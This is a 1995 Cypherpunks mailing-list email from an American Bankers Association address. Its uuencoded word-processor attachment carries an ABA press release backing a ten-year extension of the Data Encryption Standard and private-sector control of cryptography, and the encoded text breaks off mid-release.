From: KDAGUIO@aba.com
Date: Wed, 26 Jul 95 11:32:57 PDT
To: Cypherpunks@toad.com
Subject: Banks and Crypto
Message-ID: <s0164c02.040@aba.com>
MIME-Version: 1.0
Content-Type: text/plain


See attached file: F:\OFFILES\KODMAIL.MSG

begin 666 KODMAIL.MSG
M_U=00Z\L```!"@`!`````/O_!0`R`.$%```)``(```!"`````P`Q````6P``
M```"U@0``+$````,`%H```"'!0``1/L@5&EM97,@0F]L9"`H4V-A;&%B;&4I
M`-`&!@`!``8`!M#1`2,``.@";`"0&D01=`D``````%"&`'SZ40$#``%W(U@"
M4",``=&0_O[^_O[^_O_^_________O__________________________``$B
M`((`;0&"`=L!*P)/`C8#_0/0!/_____4!/_______UX[0UUD9+*D0T-#9+)#
M0T-#9&1D9&1D9&1D9$-#R++(9+*0A9"0A7B<G$Y@G(6]D)QXG)!OA9"0R)"0
MA4-#0V1D0V1O66]91F1O.$-O.*1O9&]O64Y#;V209&199&1DR.ED0V1D``!D
M9&0```!#`&1D9&1D9`!D9&\X`)!DD&209)!DD&3/D)!9A5F%6859A5E..$XX
M3CA..)!OG&2<9)QDG&20;Y!OD&^0;Y!DD&20;YQDG&209)!D>&^09)!DD&20
M69!9D%F069!OA5F%6859A5F<9)QDG&2<9)QDG&2<;YQO3CA..$XX3CBU<F``
MG&^%.(4XA3B%3H4XD&^0GY!OD&^<9)QDXI2069!9D%EO3F].;TYO3H5#A4.%
M0Y!OD&^0;Y!OD&^0;\B0D&2%6859A5D``)!OA3B0;Y!9;TZ%0Y!DD&20;YQD
MD&\30P``````9&0```!#````````0T-7R,C(R,C(R,C(R,C(R,C(R,C(R,C(
MR,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(>'AX>'AX>'AX>'AX>'AX>'AX
M>'AX>'AX>'AX>'AX>'AX>'AX>'AX>$Z0D)!D`&1D0V15561DPV1D9+*R9$9D
M9&1DLD8`0T,`<W-DLC0TR,AD9'IZF,ADR&209`!^IZ=O;[(``````$-S````
M````9```O0#I``!&(LC(R,B0D,C(R&20R,ASD)"RLLC(R```````````````
M``!DY;*RR,C(`!H`LF1#0\C(R,C(D'K(LI"0D)"0D)"0D)!X0\ADD&1O9++(
MD,B%9$-DD%ED<Y"<B<C(D)"0D)"0D)"0D,C(R,C(8,B0D)"0R,C(R,C(R,C(
MR,C(R`#(R,C(R,B0D,C(R,C(R*Z%>IS(D,@```#(R`````!5=@``````````
M````````````````````````````````````````````````````D)"0D```
M````````````````````````````R,@`````````````R```````````R,@`
M``````````#(Q9"0D&20D,B0D,C(R````)"0````D&0```"0D)"09````)"0
MD)"0````D)"0````D)"0````D)"0````D)"0D)"0D)"0D)"0D)```````)``
M``"0D)"0D)````"0D)"0D)"0D)!#````D)"00P```)"0D$,```"0D)!#````
MD)"0D````)``````````````````````````````````````````````````
M``````````````````"0````D)"0D````)"0D-&0>H5O``!Z;X59A4Z%69Q9
MD%E..)Q9A6^];Y!9A62<69!Z>F1Z9`!DA5F0685ZD&^<>GIZ>DY9.#A965EZ
M67H`>@!Z>@!#0V1D9&1D`````````````&1D````````````>GIZ>GIZ>GIZ
M>GIZ>GIZ>GIZ>DY.3DY.3DY965E965E965E965E965E965E963@X.#@X.#@X
M.#@X.%E965E965E965E965E965E965EZ>GIZ>GIZ>GIZ>GIZ>GIZ>GIZ>D,`
M`'H``)"%G$Z<D'I.D&0"9%E#`,A'4B!2971A:6P@4VAA<F5D(%!R:6YT97(@
M*%!2*0``````````1U)25#(N4%)3`%)3`%@">@#S&;@17P@````0('#L`%X0
M-Q+[`2P!"`%<`2P!\#4<'&!8`I#[_P4`,@"("0``!@`0````$P8``/__+P``
M`$0&```!`KT!``!S!@``__]8`0``,`@```@C?`!L`````0`````````";`"0
M&D01=`D``````%"&`'SZ40$#``%VE5@"4",``=%#1R!4:6UE<R!";VQD("A3
M8V%L86)L92D`1V%L;&EA<F0M4F]M86X@,3(N,'!T```!(@""`/____]M`?__
M__________________________]>0T!H<'"`K#Q,3&QP.$@X@'!P<'!P<'!P
M<'`X.'!P<$B,B(24I(1TG+!04(R`P*2H>*B,:(BHC+R$>(Q0.%!P9#Q8<%AP
M7#QL<#0T9#2H<'!L<$A(1'!<D&!<8%`X4'#I1$-D2```1%1\````0P!`?'Q\
M?'P`9'QL,`"(6)18B%B(6(A8P("4:X1<A%R$7(1<4#10-%`T4#2D<*APJ'"H
M<)APJ'"H<*APJ'!X7(A8D'"H<)AP>%RD<'9LB%B(6(A8E%B46)18E%BD<(1<
MA%R$7(1<G&R<;)QLG&R<;)QLL'"P<%`P4#!0-%`PHF!0`(QD@#2`-(`T;$AL
M,*1PI(BD<*1PJ'"H<,BUC$B,2(Q(:$B`2&A(:$B(1(A$B$2H<*APJ'"H<*AP
MJ'"\D'A<C&!X8(Q@``"D<(`TI'",2&A(B$1X7'A<I'"H<*AP3I"0D#@`>&QX
M2&]O<'#!<&QLJ*AP3$QD9'"H3`!#0P!D9'[(9&3(R'Y^>GJ8R&3(9)!D`(FY
MN7IZR```````0V0```````!D``#!`,@``$RR`04`D0`W`'H`0P`[`"P!`0``
M``%);%@">@#S&;@17P@````0('#L`%X0-Q+[`5@"D/[^_O[^_O[__O______
M__[__________________________P8'#P"0`#@`;`!#`$,`+`$!`!D``'<C
MZ`)L`)`:1!%T"0``````4(8`?/I1`0,`6`)0_O[^_O[^_O\#____`O___O__
M_____O[^_O___________O[^N`@7`(\`.0!T`$,`0P`L`0$`+P``NR8``W0`
MD!I$$9()``````!PA@`(+U$!`P!8`I#^_O[^_O[^__[________^_______^
M_O[^___________^_OZ0#?__CP`Y`&@`0P!#`"P!`0!$``#'BMP":`"0&J@1
MG`D*`````'B&`!2440$#`%@"6/[^_O[^_O[_______[___[_______[^_O[_
M__________[^_OO_!0`R`'8+```!`78```"Z"0```@%P````,`H```,!:P``
M`*`*```$`6L````+"P``?V$X1&]C=6UE;G0`9P``````````P41O8W5M96YT
M(%-T>6QE`"!3='EL90``````````````````````````````````````````
M```!%@"Z`P@`H(H``,(`6`((!P@'#P#"P@%8`F`)8`D4`,+&T"!@"<8*"G]A
M-$1O8W5M96YT`&<``````````(%$;V-U;65N="!3='EL90`@4W1Y;&4`````
M`````````````````````````````````````````@\`C]@&`*K6`P#!`@@'
M"`</`,'##,/#",,NQ`C$("#$#,1_839$;V-U;65N=`!G``````````#!1&]C
M=6UE;G0@4W1Y;&4`(%-T>6QE````````````````````````````````````
M``````````,+`+VS"`!'A@``P@%8`@@'"`</`,+&T"`(!\8*"G]A-41O8W5M
M96YT`&<``````````,%$;V-U;65N="!3='EL90`@4W1Y;&4`````````````
M````````````````````````````````!`L`?;$(`*V!``#"`%@""`<(!P\`
MPL8H(P@'Q@H*^_\%`#(`T0T```4!I0```*@+```&`78```!-#```!P%T````
MPPP```@!F@```#<-``!_83)$;V-U;65N=`!G``````````"!1&]C=6UE;G0@
M4W1Y;&4`(%-T>6QE````````````````````````````````````````````
M``4\`/%O"P#'$P8`"M0!#```!HD`/P#(``P``=3##,/8`1<`@0``````````
M``````````!!+A<``=@@PP[#UP`%``$%``#7UP$%``$%``'7"@K$#,3$#L1_
M83=$;V-U;65N=`!G``````````#!1&]C=6UE;G0@4W1Y;&4`(%-T>6QE````
M``````````````````````````````````````````86`'G]"``&A@``P@!8
M`@@'"`</`,+"`%@"8`E@"10`PL8H(V`)Q@H*0FEB;&EO9W)P:'D`````````
M````P4)I8FQI;V=R87!H>0``````````````````````````````````````
M```````````````````'%`"LBP@`ACH``,(`6`((!P@'#P#"P8"P!+`$"@#!
MQB@C"`?&"@I_83%2:6=H="!087(```````````#!4FEG:'0M06QI9VYE9"!0
M87)A9W)A<&@@3G5M8F5R<P````````````````````````````````@Z`&":
M"`!3!```P4"@!0@'#`#!V`$7````````````````````````22X7``'8((/!
M@+`$L`0*`,'"`%@""`<(!P\`PL8H(P@'Q@H*^_\%`#(`KA````D!HP````,.
M```*`:<```"F#@``"P&L````30\```P!M0```/D/``!_83)2:6=H="!087(`
M``````````#!4FEG:'0M06QI9VYE9"!087)A9W)A<&@@3G5M8F5R<P``````
M``````````````````````````E#`/WV"``%"0``P0((!P@'#P#!P4#X!V`)
M$0#!V`$7``$`````````````````````02X7``'8((/!@`@'"`</`,'"`+`$
M8`E@"10`PL8H(V`)Q@H*?V$S1&]C=6UE;G0`9P``````````@41O8W5M96YT
M(%-T>6QE`"!3='EL90``````````````````````````````````````````
M```*0@`<O0H`NF(#``K4`0P```:)`#\`R``,``'4P0((!P@'#P#!PPS#V`$7
M`((`````````````````````,2X7``'8(-<`!0`"!0``U]<!!0`"!0`!UPK$
M#,1_83-2:6=H="!087(```````````#!4FEG:'0M06QI9VYE9"!087)A9W)A
M<&@@3G5M8F5R<P````````````````````````````````M,`.,A"`"W#0``
MP0((!P@'#P#!P0)@"6`)%`#!P4!0"K@+%@#!V`$7``(`````````````````
M````,2X7``'8((/!@&`)8`D4`,'"``@'N`NX"QD`PL8H([@+Q@H*?V$T4FEG
M:'0@4&%R````````````P5)I9VAT+4%L:6=N960@4&%R86=R87!H($YU;6)E
M<G,````````````````````````````````,50"7A0@`:A```,$""`<(!P\`
MP<$"8`E@"10`P<$"N`NX"QD`P<%`J`P0#AL`P=@!%P`#````````````````
M`````&$N%P`!V""#P8"X"[@+&0#!P@!@"1`.$`X>`,+&*",0#L8*"OO_!0`R
M`!`4```-`;\```#@$```#@'(````GQ$```\!T````&<2```0`=D````W$P``
M?V$U4FEG:'0@4&%R````````````P5)I9VAT+4%L:6=N960@4&%R86=R87!H
M($YU;6)E<G,````````````````````````````````-7P!OXP@`'!4``,$"
M"`<(!P\`P<$"8`E@"10`P<$"N`NX"QD`P<$"$`X0#AX`P<%`B`YH$!\`P=@!
M&``$`````````````````````"@Q*1@``=@@@\&`$`X0#AX`P<(`N`MH$&@0
M(P#"QB@C:!#&"@I_8392:6=H="!087(```````````#!4FEG:'0M06QI9VYE
M9"!087)A9W)A<&@@3G5M8F5R<P````````````````````````````````YH
M`!L5"`#.&0``P0((!P@'#P#!P0)@"6`)%`#!P0*X"[@+&0#!P0(0#A`.'@#!
MP0)H$&@0(P#!P4#@$,`2)`#!V`$8``4`````````````````````*&$I&``!
MV""#P8!H$&@0(P#!P@`0#L`2P!(H`,+&*"/`$L8*"G]A-U)I9VAT(%!A<@``
M`````````,%2:6=H="U!;&EG;F5D(%!A<F%G<F%P:"!.=6UB97)S````````
M````````````````````````#W``9DH(`($<``#!`@@'"`</`,'!`F`)8`D4
M`,'!`K@+N`L9`,'!`A`.$`X>`,'!`F@0:!`C`,'!`L`2P!(H`,'!0+`3&!4J
M`,'8`1<`!@````````````````````!I*1<``=@@@\&`P!+`$B@`P<(`:!`8
M%1@5+0#"QB@C&!7&"@I_83A2:6=H="!087(```````````#!4FEG:'0M06QI
M9VYE9"!087)A9W)A<&@@3G5M8F5R<P``````````````````````````````
M`!!Y`%<B"``S(0``P0((!P@'#P#!P0)@"6`)%`#!P0*X"[@+&0#!P0(0#A`.
M'@#!P0)H$&@0(P#!P0+`$L`2*`#!P0(8%1@5+0#!P4`(%G`7+P#!V`$7``<`
M````````````````````82D7``'8((/!@!@5&!4M`,'"`,`2<!=P%S(`PL8H
M(W`7Q@H*^_\%`#(`P!<``!$!S````$(4```2`2L!```.%0``$P$``0``.18`
M`!0!AP```#D7``!_83%$;V-U;65N=`!G``````````"!1&]C=6UE;G0@4W1Y
M;&4`(%-T>6QE`````````````````````````````````````````````!%8
M`'$'%@!Q#08`V0$%```%``'9"M0!#```!N$`;`#(``P``=3!X%X3[!,I`,'#
M`</##,/7``4```4``-?8`1<`@`````````````````````!)+A<``=@@V0,&
M```!!@`#V=D#!@`!``8``]G7`04```4``=>#"@K$`<3$#,1$;V,@26YI=```
M```````````````!26YI=&EA;&EZ92!$;V-U;65N="!3='EL90``````````
M`````````````````````````````!(.``'_Q0`"DP``UP(*``($!`0$!`H`
M`M?4`!@``!(```$````````````P*C`JL`08``#4#-("C``@22X@02X@,2X@
M82XH,2DH82D@:2D@82D`````````````````````($DN(#$N($$N(&$N*#$I
M*&$I(&DI(&$I````````````````````````````````````````````````
M``%$;V-U;65N=`!G````````````````````````````````C``"TMD$%```
M````````````````````%``$V51E8V@@26YI=`````````````````!);FET
M:6%L:7IE(%1E8VAN:6-A;"!3='EL90``````````````````````````````
M````````$Z@`%"X```UK``#2`HP`($DN($$N(#$N(&$N*#$I*&$I(&DI(&$I
M`````````````````````"`Q("XQ("XQ("XQ("XQ("XQ("XQ("XQ(```````
M`````````````````````````````````````````/X`5&5C:&YI8V%L````
M`````````````````````````````(P``M+9!!0`````````````````````
M`!0`!-E_835496-H;FEC86P```````````"!5&5C:&YI8V%L($1O8W5M96YT
M(%-T>6QE`````````````````````````````````````````!0I`%?9`P!$
MO@,`P0((!P@'#P#!PPS#V`$8`(0`````````````````````*#$I&``!V"`N
M("#$#,3[_P4`,@!T&@``%0&'````\A<``!8!K@```'D8```7`:<````G&0``
M&`&F````SAD``']A-E1E8VAN:6-A;````````````(%496-H;FEC86P@1&]C
M=6UE;G0@4W1Y;&4`````````````````````````````````````````%2D`
ME^`#`$3"`P#!`@@'"`</`,'##,/8`1@`A0`````````````````````H82D8
M``'8("X@(,0,Q']A,E1E8VAN:6-A;````````````(%496-H;FEC86P@1&]C
M=6UE;G0@4W1Y;&4`````````````````````````````````````````%CP`
M-O,7`.CM`P`*U`$,```&B0`_`,@`#``!U,,,P]@!%P"!````````````````
M`````$$N%P`!V"###L/7``4``04``-?7`04``04``=?$#L0*"L$""`<(!P\`
MP<0,Q']A,U1E8VAN:6-A;````````````(%496-H;FEC86P@1&]C=6UE;G0@
M4W1Y;&4`````````````````````````````````````````%SD``U<3`*)G
M`P`*U`$,```&E@`R`,@`#``!U,,,P]@!%P""`````````````````````#$N
M%P`!V"#7``4``@4``-?7`04``@4``=<*P0((!P@'#P#!Q`S$?V$T5&5C:&YI
M8V%L````````````@51E8VAN:6-A;"!$;V-U;65N="!3='EL90``````````
M```````````````````````````````8.`!B=A,`HGL#`-0!#```!I8`,@``
M``P``=3##,/8`1<`@P````````````````````!A+A<``=@@UP`%``,%``#7
MUP$%``,%``'7"L$""`<(!P\`P<0,Q/O_!0`R`'<@```9`<(```"F&@``&@&&
M````:!L``!L!A@```.X;```<`0,$``!T'```?V$Q5&5C:&YI8V%L````````
M````@51E8VAN:6-A;"!$;V-U;65N="!3='EL90``````````````````````
M```````````````````91@"RZ"$`$SP#``K4`0P```:)`#\`R``,``'4PP'#
MPPS#UP`%```%``#7V`$7`(``````````````````````22X7``'8(-D#!@``
M`08``]G9`P8``0`&``/9UP$%```%``'7"@K$`<3!`@@'"`</`,'$#,1_83=4
M96-H;FEC86P```````````"!5&5C:&YI8V%L($1O8W5M96YT(%-T>6QE````
M`````````````````````````````````````!HH`$`7`P!$Q@,`P0((!P@'
M#P#!PPS#V`$7`(8`````````````````````:2D7``'8("X@(,0,Q']A.%1E
M8VAN:6-A;````````````(%496-H;FEC86P@1&]C=6UE;G0@4W1Y;&4`````
M````````````````````````````````````&R@`X!H#`$3+`P#!`@@'"`</
M`,'##,/8`1<`AP````````````````````!A*1<``=@@+B`@Q`S$4&QE861I
M;F<``````````````````$AE861E<B!F;W(@;G5M8F5R960@<&QE861I;F<@
M<&%P97(````````````````````````````<JP-00```;KD``-``"````,@`
M"```T-`%#`"P!+`$(`/H`PP`!=#5`8L#``````````'(``(``````"1=T``(
M````R``(``#0T`$,`+`$L`18`K`$#``!T-`$T````%@"L`0(!V`)N`L0#F@0
MP!(8%7`7R!D@''@>T"`H(X`EV"<P*H@LX"XX,9`SZ#5`.)@Z\#Q(/Z!!____
M_________________________P``````````````````````````P`/_____
M____________________________________________________________
M______________________________________\@````````````````````
M`````+`$___0``30V@9Y````$`,(`/@J_`.P!```````````````````````
M````9`````````!D`&0`````````````````````````````````````````
M``````````````````````````````````$``````````````````````'D`
M!MK:!GD````0`P@`^"H4!+`$``````````````````````````!D````````
M`&0`9```````````````````````````````````````````````````````
M`````````````````````0``````````````````````>0`&V@H*P4A(`\`#
M!P#!,8,*"L%(2`/``P<`P3*#"@K!2$@#P`,'`,$S@PH*P4A(`\`#!P#!-(,*
M"L%(2`/``P<`P36#"@K!2$@#P`,'`,$V@PH*P4A(`\`#!P#!-X,*"L%(2`/`
M`P<`P3B#"@K!2$@#P`,'`,$Y@PH*P4C0`L`#!@#!,3"#"@K!2-`"P`,&`,$Q
M,8,*"L%(T`+``P8`P3$R@PH*P4C0`L`#!@#!,3.#"@K!2-`"P`,&`,$Q-(,*
M"L%(T`+``P8`P3$U@PH*P4C0`L`#!@#!,3:#"@K!2-`"P`,&`,$Q-X,*"L%(
MT`+``P8`P3$X@PH*P4C0`L`#!@#!,3F#"@K!2-`"P`,&`,$R,(,*"L%(T`+`
M`P8`P3(Q@PH*P4C0`L`#!@#!,C*#"@K!2-`"P`,&`,$R,X,*"L%(T`+``P8`
MP3(T@PH*P4C0`L`#!@#!,C6#"@K!2-`"P`,&`,$R-H,*"L%(T`+``P8`P3(W
M@PH*P4C0`L`#!@#!,CC3!@D``<`K(`,)``;3BP,!U?O_!0`R`*0E```=`7T!
M``"I(```'@%]`0``)B(``/__1````*,C```"`KT!``#G(P``4W1A9V5G=6ED
M90```````````````%-T86=I;F<@1W5I9&4@1F]R;6%T````````````````
M```````````````````````````````=)0'_E@``E0,``-$!(P``)@)D`(0<
M?!7\"``````00(X`-RY1$`,``3OV6`)`(P`!T=`%#`"P!+`$=`2P!`P`!=#0
M`0P`L`2P!(0#A`,,``'0T`30````6`*P!`@'8`FX"Q`.:!#`$A@5<!?(&2`<
M>![0("@C@"78)S`JB"S@+C@QD#/H-4`XF#KP/$@_H$'_________________
M____________```````````````````````````L`;X%>!C_____________
M____________________________________________________________
M_________________________P``````````````````````````L`2$`]``
M!-#0!@8``0`&``;04W1A9V5G`````````````````````%-T86=I;F<@1W5I
M9&4@1F]R;6%T('=I=&@@0V]U<FEE<B`Q,"!&;VYT```````````````````>
M)0&FW```:B\``-$!(P``]`%X`!0>#!>,"@````010,D`DSC'$3L``!\I6`)`
M(P`!T=`%#`"P!+`$=`2P!`P`!=#0`0P`L`2P!(0#A`,,``'0T`30````6`*P
M!`@'8`FX"Q`.:!#`$A@5<!?(&2`<>![0("@C@"78)S`JB"S@+C@QD#/H-4`X
MF#KP/$@_H$'_____________________________````````````````````
M```````L`;X%>!C_____________________________________________
M_____________________________________________________P``````
M````````````````````L`2$`]``!-#0!@8``0`&``;00T<@5&EM97,@0F]L
M9"`H4V-A;&%B;&4I`$=A;&QI87)D+5)O;6%N(#$R+C!P=`!'86QL:6%R9"U"
M;VQD(#$R+C!P=````2(`@@#_____;0'_____________________________
M7D,\9'AXB+`\4%!T>#Q,/(1X>'AX>'AX>'AX/#QX>'A,H)2,F*B,?*B\6%B<
MB,BLK(2PF'20L)C$D(B06%A8>&0\8'A8>%Q(<'@\.'`\L'AT='A44$QX9)QH
M9&!8/%AXZ41#:%```$1<?````$,`1'Q\?'Q\`&1\>#``E&"48)1@E&"48,2(
MF&N,7(Q<C%R,7%@\6#Q8/%@\K'BL=*QTK'28=+!XL'BP>+!XB&248)!XK'28
M=(ADJ'1V=)1@E&"48)A8F%B86)A8J'B,7(Q<C%R,7*APJ'"H<*APJ'"H<+QX
MO'A8,%@P6#Q8,*=@6`"<<(@\B#R(/&Q.;#BL>*R0K'BL>*QTK'3(M9A4F%28
M5'10@%!T4'10D$R03)!,L'BP>+!XL'BP>+!XQ)R(9)!@>&"08```J'B(/*QX
MF%1T4)!,B&2(9*AXK'2P>$Z0D)`\`'1TA$QO;WAXP7AT=+2T>$Q.9&1XM$P`
M0T,`9&1^R&AHR,A^?GIZF,ADR&209`")N;EZ>L@``````$-D````````9```
MR`#(``!,^_\%`#(`(2H``/__6P```-8E```#`KT!```Q)@``!P!V````[B<`
M``0"O0$``&0H``!#1R!4:6UE<R!";VQD("A38V%L86)L92D`1V%L;&EA<F0M
M4F]M86X@,3(N,'!T`$=A;&QI87)D+4)O;&0@,3(N,'!T`$=A;&QI87)D+4ET
M86QI8R`Q,BXP<'0```$B`((`_____VT!____________________________
M_UY#0%QH:(2\.%14;&@T1#1<:&AH:&AH:&AH:#0T:&AH4)"8?)2@?'"4K%10
MG'BTJ)AXF)Q@@*2(O)B,>%@T5&AD.&Q<3&Q,0&!@0#Q<.*1T5&!@5#A$=%R(
M8$Q86#18:.E(0U1$```X4'P```!#`#Q\?'Q\?`!D?&`P`)ALE&R8;)ALF&RX
M7)1K?$Q\3'Q,?$Q40%1`5$!40*ATF%285)A4F%2D=*1TI'2D=(Q,F&R0;)A4
MF%2,3*!4=F"8;)ALF&R43)1,E$R43*!L?$Q\3'Q,?$R48)1@E&"48)1@E&"L
M8*Q@5#!4,%1`5#"?8%``G%QX.'@X>#AL/VPPJ'2HE*ATJ'285)A4R+6<5)Q4
MG%1@.(`X8#A@.(!$@$2`1*1TI'2D=*1TI'2D=+R(C$QX6'A@>%@``*!L>#BH
M=)Q48#B`1(Q,C$R@;)A4I'1.D)"0-`!L;'A0;V]H:,%H;&R<G&A,3&1D:)Q,
M`$-#`&1D?LA86,C(?GYZ>IC(9,ADD&0`B;FY>GK(``````!#9````````&0`
M`,@`R```3$-'(%1I;65S($)O;&0@*%-C86QA8FQE*0!'86QL:6%R9"U2;VUA
M;B`Q,BXP<'0`1V%L;&EA<F0M0F]L9"`Q,BXP<'0`1V%L;&EA<F0M271A;&EC
M(#$R+C!P=`!'86QL:6%R9"U";VQD271A;&EC(#$R+C!P=````2(`@@#_____
M;0'_____________________________7D,X8&AH@+PX6%AT:#1(-%1H:&AH
M:&AH:&AH-#1H:&A0C)R$E*2$?)RT7%BD?+2HG("<H&2`I)3$F)1\6#18:&0X
M<&!,;%!$9&1,.&1`K'Q88&1</$1\9(QD5%A8-%AHZ4A#8$@``#Q<?````$,`
M0'Q\?'Q\`&1\8#``G'"4<)QPG'"<<,1DE&N$4(10A%"$4%Q,7$Q<3%Q,J'R<
M6)Q8G%B86*1\I'RD?*1\E%2<<)!LD%B86)14I%AV8)QPG'"<<)1,E$R43)1,
MI&R$4(10A%"$4)QDG&2<9)QDG&2<9+1DM&1<,%PP7$Q<,*=@6`"D9'Q`?$!\
M0&Q4;#BH?*B<J'RH?)Q8G%C(M:!<H%R@7&0\@#QD/&0\@$2`1(!$I'RD?*1\
MI'RD?*1\Q(R45'Q8>&!\6```I&Q\0*A\H%QD/(!$E%245*1LG%BD?$Z0D)`T
M`&QL@%!O;VAHQ&AL;)R<:$Y.9&1HG$X`0T,`9&1^R&!@R,A^?GIZF,ADR&20
M9`")N;EZ>L@``````$-D````````9```R`#(``!.^_\%`#(```````\`6@(`
M`%,J``#__R$````C!@``"``"````K2P```````````````"R`04`D0`W`'H`
M0P`[`"P!`0````%);%@">@#S&;@17P@````0('#L`%X0-Q+[`5@"D/[^_O[^
M_O[__O________[__________________________P8'#P"0`#@`;`!#`$,`
M+`$!`!D``'<CZ`)L`)`:1!%T"0``````4(8`?/I1`0,`6`)0_O[^_O[^_O\#
M____`O___O_______O[^_O___________O[^N`@7`(\`.0!T`$,`0P`L`0$`
M+P``NR8``W0`D!I$$9()``````!PA@`(+U$!`P!8`I#^_O[^_O[^__[_____
M___^_______^_O[^___________^_OZ0#?__CP`Y`&@`0P!#`"P!`0!$``#'
MBMP":`"0&J@1G`D*`````'B&`!2440$#`%@"6/[^_O[^_O[______P3___[_
M______[^_O[___________[^_B0+__^0`#@`;`!#`$,`+`$!`%L``"?$W`)L
M`)`:Y!%T"0H`````>(8`JO-1`0,`6`*8_O[^_O[^_O___________O______
M_O[^_O___________O[^_____P``9```R`#(``!,````````````````````
M````````````````````````````````````````````````````````````
M``````````````#_____`````````````````````````````````````.D`
M2`!#`%0`1```````.`!0`'P`````````0P```#P`?`!\`'P`?`!\````9`!\
M`&``,```````T`OW`)`SV"<!````````````````````````````````````
M````````````````````D#/8)P$(4W1A;F1A<F0`````````````````````
M````````````````````````D#/8)P$`````````````````````````````
M``````````````````````````"0,]@G`0!3=&%N9&%R9`!3!/__```#`')*
M970@24E)`!'__P```1?Z$1H`%!*I`@``1/NP!+`$L`2P!```````````````
M``````````$``````````````````````````````/<`"]!4:&4@06UE<FEC
M86X@0F%N:V5R<R!!<W-O8VEA=&EO;B!I<R!A='1E;7!T:6YG('1O(&%D9')E
M<W,@=&AE('!R:79A8WD@86YD('-E8W5R:71Y(&YE961S#6]F(&)A;FMS(&%N
M9"!B86YK(&-U<W1O;65R<R!B>2!E;G-U<FEN9R!T:&%T(&5A8V@@:&%V92!A
M8V-E<W,@=&\@87!P<F]P<FEA=&4-8W)Y<'1O9W)A<&AI8R!T;V]L<RX*"E1H
M92!!0D$@0W)Y<'1O9W)A<&AI8R!0;VQI8WD@=VEL;"!B92!P;W-T960@;VX@
M=&AI<R!L:7-T(&QA=&5R('1O9&%Y+@H*("`@("`@("`@*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ"M0`'```%E\&
M`0```````````#`J,"HP*K`$L`0<``#4#`K0!0P`L`2P!+`$6`(,``70T`4,
M`+`$6`*P!+`$#``%T-`%#`"P!+`$L`18`@P`!=#0!0P`L`18`K`$L`0,``70
MT`4,`+`$L`2P!%@"#``%T-`%#`"P!%@"L`1H`0P`!=#0!0P`L`1H`;`$L`0,
M``70T`4,`+`$L`2P!%@"#``%T-`%#`"P!%@"L`2P!`P`!=#0!0P`L`2P!+`$
M6`(,``70"D-/3E1!0U0Z("!3;VYI82!"87)B87)AP0)H$&@0)@#!P0+`$L`2
M+`#!P0(8%1@5,@#!("`@("`@("`@1D]2($E-345$24%412!214Q%05-%"L$"
M"`<(!Q``P2`@("`@("`@("@R,#(I(#8V,ZDU-#8Y("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@*#$Y.34I"@K4`0P```:/`%H`C00,``'4PPS#T`8&```"!@`&T-0%"``7
M`!L'"``%U$%"02!214%&1DE235,@4U504$]25"!&3U(@4%))5D%41:E314-4
M3U(@0T].5%)/3"`*U`4(`"@`K0\(``743T8@0U)94%1/1U)!4$A9"M0%"``O
M`.P3"``%U,0,Q,,,P\,(PPK4!0@`"@`E!@@`!=1!<W-O8VEA=&EO;B!296-O
M;6UE;F1S(&$@,3"I>65A<B!%>'1E;G-I;VX@9F]R('1H92!$871A($5N8W)Y
M<'1I;VX@4W1A;F1A<F0*U`4(`"\`[!,(``74"M0!#```!I``60`:"0P``=34
M!0@`+P#L$P@`!=30!@8``@`&``;0U`4(``L`L`0(``74Q`S$Q`C$P0((!P@'
M$`#!T`((```!@`$(``+05T%32$E.1U1/3BP@2G5L>2`R,2"IJ2!4:&4@1&%T
M82!%;F-R>7!T:6]N(%-T86YD87)D("A$15,I('-H;W5L9"!B90UR96-E<G1I
M9FEE9"!F;W(@870@;&5A<W0@,3`@;6]R92!Y96%R<R!T;R!A;&QO=R!I;G1E
M<F5S=&5D(&9I;F%N8VEA;"!I;G-T:71U=&EO;G,@861E<75A=&4-=&EM92!T
M;R!C;VYV97)T('1O(&%N>2!N97<@8W)Y<'1O9W)A<&AY('-T86YD87)D+"!T
M:&4@06UE<FEC86X@0F%N:V5R<R!!<W-O8VEA=&EO;B!S86ED#6EN(&$@<&]L
M:6-Y('-T871E;65N="!I<W-U960@=&]D87DN"L$""`<(!Q``P45N8W)Y<'1I
M;VX@:7,@=&AE('!R;V-E<W,@=VAE<F5B>2!S96YS:71I=F4@9&%T82!C;VUM
M=6YI8V%T:6]N<RP@<W5C:"!A<R!W:7)E#71R86YS9F5R<RP@8W)E9&ET(&-A
M<F0@86YD(&%U=&]M871E9"!T96QL97(@;6%C:&EN92!T<F%N<V%C=&EO;G,L
M(&%R92!P<F]T96-T960@8GD@<V5C<F5T#6-O9&5S('1O('!R;W1E8W0@=&AE
M:7(@8V]N9FED96YT:6%L:71Y+B`@($1%4RP@<F5L96%S960@:6X@,3DW-RP@
M:7,@=&AE('!R:6UA<GD@;65T:&]D#75S960@8GD@9FEN86YC:6%L(&EN<W1I
M='5T:6]N<R!T;R!E;F-R>7!T(&EN9F]R;6%T:6]N+@K!`@@'"`<0`,%#<FET
M:6-S('-A>2!T:&%T('1H92!L;VYG97(@1$53(&ES('5S960L('1H92!M;W)E
M(&QI:V5L>2!I=',@8V]D92!C;W5L9"!B92!B<F]K96XN"E=H:6QE(')E86QI
M>FEN9R!T:&ES(&-O=6QD(&QI;6ET(&ET<R!L:69E('-P86X@87,@82!G;W9E
M<FYM96YT(&-E<G1I9FEE9"!S=&%N9&%R9"P@04)!#7=A<FYE9"!T:&%T(')E
M<75I<FEN9R!B86YK<R!T;R!C;VYV97)T('1O(&$@;F5W('-T86YD87)D(&)Y
M(#$Y.3@@*'1H92!Y96%R($1%4R=S#6-E<G1I9FEC871I;VX@97AP:7)E<RD@
M8V]U;&0@8F4@<')O:&EB:71I=F5L>2!C;W-T;'D@9'5E('1O('1H92!H:6=H
M(&QE=F5L(&]F(&5L96-T<F]N:6,@9G5N9',-=')A;G-F97)S('-E8W5R960@
M8GD@1$53+B`@04)!('1H97)E9F]R92!E;F-O=7)A9V5D('1H92!.871I;VYA
M;"!);G-T:71U=&4@9F]R(%-T86YD87)D<PUA;F0@5&5C:&YO;&]G>2`H3DE3
M5"D@=&\@8V]N=&EN=64@=&\@96YD;W)S92!$15,@87,@82!&961E<F%L($EN
M9F]R;6%T:6]N(%!R;V-E<W-I;F<-4W1A;F1A<F0@*$9)4%,I(&9O<B!U<V4@
